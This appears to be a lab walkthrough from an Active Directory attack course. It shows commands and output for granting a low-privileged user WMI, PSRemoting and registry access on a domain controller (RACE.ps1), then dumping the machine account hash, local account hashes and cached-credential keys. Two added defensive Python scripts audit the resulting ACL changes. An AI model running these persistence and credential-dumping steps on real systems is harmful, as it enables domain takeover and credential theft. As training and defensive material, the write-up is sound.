# Learning Objective - 13

## Security Descriptors

### Set-RemoteWMI

We run gwmi to check whether we have permission to run WMI queries on the DC.

```
PS C:\ad\tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc
gwmi : Access is denied.
At line:1 char:1
+ gwmi -class win32_operatingsystem -ComputerName dcorp-dc
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

```

Now we add the ACL entry. The verbose output shows the existing and the new SDDL for both the root namespace and DCOM, so the change can be compared before and after.

```
PS C:\ad\Tools> Set-RemoteWMI -SamAccountName student723 -ComputerName dcorp-dc -verbose
VERBOSE: Existing ACL for namespace root is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)
VERBOSE: Existing ACL for DCOM is
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCD
CSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)
VERBOSE: New ACL for namespace root is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S-
1-5-21-719815819-3726368948-3917688648-13603)
VERBOSE: New ACL for DCOM
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCD
CSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)(A;;CCDCLCSWR
P;;;S-1-5-21-719815819-3726368948-3917688648-13603)
```

Then we run the query again.

```
PS C:\ad\tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc


SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348


```

### Set-RemotePSRemoting

We try to get a shell with Enter-PSSession.

```
PS C:\ad\tools> Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
Enter-PSSession : Connecting to remote server dcorp-dc failed with the following error message : Access is denied. For
more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1
+ Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (dcorp-dc:String) [Enter-PSSession], PSRemotingTransportException
    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed
```

Now we add the ACL entry.

```
PS C:\ad\Tools> Set-RemotePSRemoting -SamAccountName student723 -ComputerName dcorp-dc -Verbose
[dcorp-dc] Processing data from remote server dcorp-dc failed with the following error message: The I/O operation has
been aborted because of either a thread exit or an application request. For more information, see the
about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
```

We ignore the error and try to open the remote PowerShell session again.

```
PS C:\ad\tools> Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
[dcorp-dc]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-dc]: PS C:\Users\student723\Documents>
```

And it worked :D.
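The SDDL strings that Set-RemoteWMI prints are exactly what a defender would compare when auditing a domain controller. The following Python is an added example, not part of the course material or of RACE.ps1: it parses an SDDL DACL, diffs the root-namespace strings from the Set-RemoteWMI output above, decodes the rights as WMI interprets them on a namespace, and flags any trustee outside the default baseline (the four SIDs BA, NS, LS and AU that the "existing" ACL names). The same parser applies to the session configuration SDDL that Set-RemotePSRemoting changes (visible with `Get-PSSessionConfiguration`), so it covers the PSRemoting step as well. The baseline set and the write-right grouping are my assumptions; the WBEM right-to-bit mapping is the documented one.

```python
import re
from dataclasses import dataclass

# SDDL two-letter access-right codes and the access-mask bit each one stands for.
RIGHT_BITS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
    "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000, "GX": 0x20000000,
    "GW": 0x40000000, "GR": 0x80000000,
}
# How WMI interprets those bits on a namespace (WBEM_* specific rights + standard rights).
WMI_RIGHT_NAMES = {
    0x1: "WBEM_ENABLE", 0x2: "WBEM_METHOD_EXECUTE", 0x4: "WBEM_FULL_WRITE_REP",
    0x8: "WBEM_PARTIAL_WRITE_REP", 0x10: "WBEM_WRITE_PROVIDER", 0x20: "WBEM_REMOTE_ACCESS",
    0x40: "WBEM_RIGHT_SUBSCRIBE", 0x80: "WBEM_RIGHT_PUBLISH",
    0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
}
# Assumption: rights that let a trustee change the namespace or its ACL count as "write-capable".
WMI_WRITE_BITS = 0x4 | 0x8 | 0x10 | 0x40000 | 0x80000


@dataclass(frozen=True)
class Ace:
    ace_type: str   # A = access allowed, D = access denied, ...
    flags: str      # e.g. CI = container inherit
    mask: int
    sid: str        # two-letter alias (BA, AU, ...) or a full S-1-... string


def parse_rights(rights: str) -> int:
    """Decode an ACE rights field: either a hex mask or a run of two-letter codes."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    if len(rights) % 2:
        raise ValueError(f"malformed rights field {rights!r}")
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= RIGHT_BITS[rights[i:i + 2]]   # KeyError on an unknown code is deliberate
    return mask


def parse_dacl(sddl: str) -> list:
    """Return the ACEs of the D: section. Whitespace (console line wrapping) is removed first."""
    sddl = re.sub(r"\s+", "", sddl)
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("SDDL string has no DACL")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        parts = body.split(";")
        if len(parts) != 6:
            raise ValueError(f"malformed ACE {body!r}")
        ace_type, flags, rights, _object_guid, _inherit_guid, sid = parts
        aces.append(Ace(ace_type, flags, parse_rights(rights), sid))
    return aces


def describe_wmi(mask: int) -> list:
    """Human-readable WMI right names for an access mask."""
    return [name for bit, name in sorted(WMI_RIGHT_NAMES.items()) if mask & bit]


def added_aces(before: str, after: str) -> list:
    """ACEs present in `after` but not in `before` (order-insensitive)."""
    base = set(parse_dacl(before))
    return [a for a in parse_dacl(after) if a not in base]


def unexpected_grants(sddl: str, expected_sids: set) -> list:
    """Allow ACEs whose trustee is outside the baseline. The default root-namespace DACL on
    the DC only names BA, NS, LS and AU, so any other SID here needs an explanation."""
    return [a for a in parse_dacl(sddl) if a.ace_type == "A" and a.sid not in expected_sids]


# Root namespace DACL before and after Set-RemoteWMI, copied from the verbose output above
# (the wrapped SID line is kept as printed to show that wrapping is handled).
ROOT_BEFORE = "O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)"
ROOT_AFTER = """O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S-
1-5-21-719815819-3726368948-3917688648-13603)"""
ROOT_BASELINE_SIDS = {"BA", "NS", "LS", "AU"}   # assumption: the DC's default trustees

if __name__ == "__main__":
    for ace in added_aces(ROOT_BEFORE, ROOT_AFTER):
        kind = "write-capable" if ace.mask & WMI_WRITE_BITS else "read-only"
        print(f"new {kind} ACE for {ace.sid} (flags {ace.flags}): {', '.join(describe_wmi(ace.mask))}")
    print("trustees outside baseline:",
          [a.sid for a in unexpected_grants(ROOT_AFTER, ROOT_BASELINE_SIDS)])
```

Running it reports one new container-inheritable ACE for the student's SID with the same full mask (0x6003F) that Builtin Administrators hold, including WRITE_DAC, which is what makes the grant self-sustaining. Feeding the function a baseline SDDL exported from a clean DC instead of the literal set above turns it into a simple drift check.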

### Add-RemoteRegBackdoor

We add ACEs on the registry keys so that we can extract information from them later:

```
PS C:\ad\Tools> Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student723 -Verbose
VERBOSE: [dcorp-dc : ] Using trustee username 'student723'
VERBOSE: [dcorp-dc] Remote registry is not running, attempting to start
VERBOSE: [dcorp-dc] Attaching to remote registry through StdRegProv
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103
 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with
user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the
key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and
AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS)
and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the
newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS)
and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly
 created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and
 AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key
VERBOSE: [dcorp-dc : SECURITY] Backdooring started for key
VERBOSE: [dcorp-dc : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SECURITY] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SECURITY] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SECURITY] Backdooring completed for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring started for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At C:\ad\Tools\RACE.ps1:2268 char:13
+             $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [dcorp-dc] Backdooring completed for system

ComputerName BackdoorTrustee
------------ ---------------
dcorp-dc     student723

```

Now we can extract information such as:

The computer account hash.

```
PS C:\AD\Tools> . .\RACE.ps1
PS C:\AD\Tools> Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key        : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C

ComputerName MachineAccountHash
------------ ------------------
dcorp-dc     ef7a661f7edb7f5a1be191640342d6b7
```

The hashes of the local accounts.

```
PS C:\AD\Tools> Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: HBootKey : 3A7C1B66C61B8E967267FA0CB9D560265774BB4ACA899D52D1DC5ADD11C20C19


ComputerName : dcorp-dc
UserName     : Administrator
UserRID      : 500
UserLMHash   : f618da2acca75dbd3afd9486927b2f05
UserNTLMHash : 24275a16f48a1ad2580f4146ba1d192c

ComputerName : dcorp-dc
UserName     : Guest
UserRID      : 501
UserLMHash   : c09e6e3be671fbc51afb1722e5777af5
UserNTLMHash : f269747c02eebd676a1e8221ad80bc74

ComputerName : dcorp-dc
UserName     : DefaultAccount
UserRID      : 503
UserLMHash   : 61b3c0708bd8d8dc4be7dba6056eb71e
UserNTLMHash : 8f049f1b7806434b7cdf2821a375eec8

ComputerName : dcorp-dc
UserName     : WDAGUtilityAccount
UserRID      : 504
UserLMHash   : aad3b435b51404eeaad3b435b51404ee
UserNTLMHash : 31d6cfe0d16ae931b73c59d7e0c089c0

```

The domain cached credentials.

```
PS C:\AD\Tools> Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key        : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C
VERBOSE: NL$KM Key     : 21 55 A8 F7 64 DD 9A FA 80 95 0F 03 E8 E4 76 5E 11 34 99 56 DE 62 E1 00 C6 FD 7D B8 14 AF 4F
73 58 C1 68 E3 16 E2 04 98 93 A5 39 C6 1B 7A E4 19 FE E6 EF DC 73 64 72 8C F9 2A F2 5C 68 D2 DB 73
```
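The keys that Add-RemoteRegBackdoor modifies are precisely the ones the extraction functions read afterwards: the four Lsa subkeys (JD, Skew1, GBG, Data) are the ones whose class data makes up the boot key, SECURITY holds the LSA secrets and cached domain credentials, and SAM holds the local hashes, so even a read-only grant to an unexpected trustee on any of them is worth alerting on. As an added example (not part of the course material or of RACE.ps1), this Python audits a snapshot of registry ACEs for those keys. The snapshot is constructed to mirror the verbose output above (mask 983103 with CONTAINER_INHERIT_ACE for student723 on each key) plus two benign entries; the key list, the expected-trustee set and the severity rule are my assumptions, while the KEY_* bit values are the documented registry rights.

```python
from dataclasses import dataclass

# Registry access-mask bits: KEY_* specific rights plus the standard rights.
REG_RIGHT_NAMES = {
    0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
    0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
}
KEY_ALL_ACCESS = 0xF003F        # 983103 decimal, the mask in the Add-RemoteRegBackdoor output
KEY_READ = 0x20019              # READ_CONTROL | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY
CONTAINER_INHERIT_ACE = 0x2

# Keys under HKLM that the tool touched, and what access to each one yields (assumed list).
SENSITIVE_KEYS = {
    r"SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg":
        "controls who may connect to the remote registry service at all",
    r"SYSTEM\CurrentControlSet\Control\Lsa\JD": "boot key (SysKey) component",
    r"SYSTEM\CurrentControlSet\Control\Lsa\Skew1": "boot key (SysKey) component",
    r"SYSTEM\CurrentControlSet\Control\Lsa\Data": "boot key (SysKey) component",
    r"SYSTEM\CurrentControlSet\Control\Lsa\GBG": "boot key (SysKey) component",
    r"SECURITY": "LSA secrets: machine account password, cached domain credentials",
    r"SAM\SAM\Domains\Account": "local account LM/NT hashes",
}


@dataclass(frozen=True)
class RegAce:
    key: str        # path relative to HKLM
    trustee: str
    mask: int
    flags: int


@dataclass(frozen=True)
class Finding:
    key: str
    trustee: str
    severity: str   # "high" if the grant can modify the key or its ACL, else "medium"
    rights: tuple
    impact: str


def decode_mask(mask: int) -> tuple:
    """Human-readable registry right names for an access mask."""
    return tuple(name for bit, name in sorted(REG_RIGHT_NAMES.items()) if mask & bit)


def audit(aces, expected_trustees: set) -> list:
    """Flag every grant on a sensitive key to a trustee outside the expected set.
    Read-only grants are still reported, because reading SAM, SECURITY and the
    boot-key class data is all the extraction step needs."""
    findings = []
    for ace in aces:
        if ace.key not in SENSITIVE_KEYS or ace.trustee in expected_trustees:
            continue
        beyond_read = ace.mask & ~KEY_READ
        findings.append(Finding(ace.key, ace.trustee, "high" if beyond_read else "medium",
                                decode_mask(ace.mask), SENSITIVE_KEYS[ace.key]))
    return findings


# Constructed snapshot modelled on the verbose output above: one ACE per backdoored key for
# student723, plus a default SYSTEM grant and an unrelated key. Real input would come from
# exporting each key's DACL on the DC.
SNAPSHOT = [RegAce(key, "student723", KEY_ALL_ACCESS, CONTAINER_INHERIT_ACE)
            for key in SENSITIVE_KEYS] + [
    RegAce(r"SECURITY", "SYSTEM", KEY_ALL_ACCESS, CONTAINER_INHERIT_ACE),
    RegAce(r"SOFTWARE\ExampleApp", "student723", KEY_ALL_ACCESS, CONTAINER_INHERIT_ACE),
]
EXPECTED_TRUSTEES = {"SYSTEM", "Administrators", "CREATOR OWNER"}   # assumed DC baseline

if __name__ == "__main__":
    for f in audit(SNAPSHOT, EXPECTED_TRUSTEES):
        print(f"[{f.severity}] HKLM\\{f.key}: {f.trustee} has {', '.join(f.rights)} -> {f.impact}")
```

Every one of the seven backdoored keys comes back as a high-severity finding, since the mask includes KEY_SET_VALUE and WRITE_DAC; the SYSTEM grant and the unrelated key produce nothing. Note that the tool's own output shows the SAM key step hitting a "DACL cannot be found" error, so an audit should read the resulting ACL back rather than trust the "Backdooring completed" message either way.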
